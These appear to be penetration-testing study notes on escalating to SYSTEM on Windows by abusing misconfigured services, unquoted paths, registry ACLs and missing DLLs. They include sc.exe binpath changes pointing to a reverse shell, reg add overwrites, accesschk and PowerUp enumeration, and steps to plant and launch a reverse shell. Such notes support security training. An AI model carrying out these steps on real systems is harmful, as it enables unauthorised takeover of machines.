Service Exploits

If a service runs with a SYSTEM Privs and are misconfigured, exploiting them may lead to command execution with SYSTEM privilege as well.

Service Commands

# Query the configuration of a service
sc.exe qc <name>

# Query the current status of a service
sc.exe query <name>

# Modify a configuration option of a service
sc.exe config <name> <option>= <value>

# Start/Stop a service
net start/stop <name>

Service Misconfigurations

Insecure Service Permissions

Each service has an ACL which defined certain service-specific permission

# Innocuous Service Permission
SERVICE_QUERY_CONFIG
SERVICE_QUERY_STATUS

# Usefull Service Permission to check weather service is starable or stopable by the user
SERVICE_STOP
SERVICE_START

# Dangerous Service
SERVICE_CHANGE_CONFIG
SERVICE_ALL_ACCESS

• If user has permission to change service configuration with SYSTEM priv, the change the executable path with our own

• We need to have permission to start/stop the service, to be able to escalate prvileges Check ACLs for a service

.\accesschk.exe /accepteula -uwcqv <user> <service>

• Change binary path of a service

sc.exe config <service> binpath= "\"C:\reverse_shell.exe\""

# start service to start the reverse shell
net start <service>

• Using powershell to enumerate the pathnames

Get-WmiObject -Class win32_service | select-object pathname

• PowerUp can be used to query services whose binpath can be mofified by the current user:

Get-ModifiableServiceFile -Verbose

• PowerUp can be used to query services whose configuration can be changed by the current user:

Get-ModifiableService -Verbose

Unquoted Service Path

# runs someProgram.exe
"C:\Program Files\Some Dir\SomeProgram.exe"

C:\Program Files\Some Dir\SomeProgram.exe
# Should run Program first with two argument Files\Some and Dir\Someprogram.exe
# windows resolve this ambiguity by checking each possibiltity in turn.
# Execution order:
# 1. "C:\Program"
# 2. "C:\Program Files\Some"
# 3. "C:\Program Files\Some Dir\SomeProgram.exe"

• This can be exploited to check which directory can we access and put our reverse shell there with write access.

• To check write access for each of these directories

.\acchesschk -quvdw "C:\"
.\acchesschk -quvdw "C:\Program Files\"
.
.
.

• After writeable path is found. Copy the reverse shell.

# "C:\Program Files\Some"
net start

• We get a reverse shell

• PowerUp script can be used to search for unquoted service paths:

Get-ServiceUnquoted -Verbose

Weak Registry Permission

• Stores data for each service

• Registries have ACL

• ACLs can be misconfigured

• may be possible to service config via registry.

# Verify Writable registry keys:
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | select-object -Property *

# Verify writibility via accesschk
.\accesshk -quv

# Query the registry key
reg query <registry>

# Overwrite the exectable
reg add <registry> /v <variable> /t <data_type> /d <data> /f

# restart the service
net start regsvc

Insecure Service Executable

If the original executable is modifiable by our user.

# Overwrite the service executable with our reverse shell.
net start <service>

DLL Hijacking

• A DLL is missing from the system.

• Our user has write permission on the directory where the DDL is looked for by the system.

• DDL is executed with the same privilege as the process that imports the DLL

# Test which service we can stop and start
# copy over to our system
# Use procmon64 to analyze missing DLL
# Check if that path is writable or not
# Place reverse shell there
net start <service>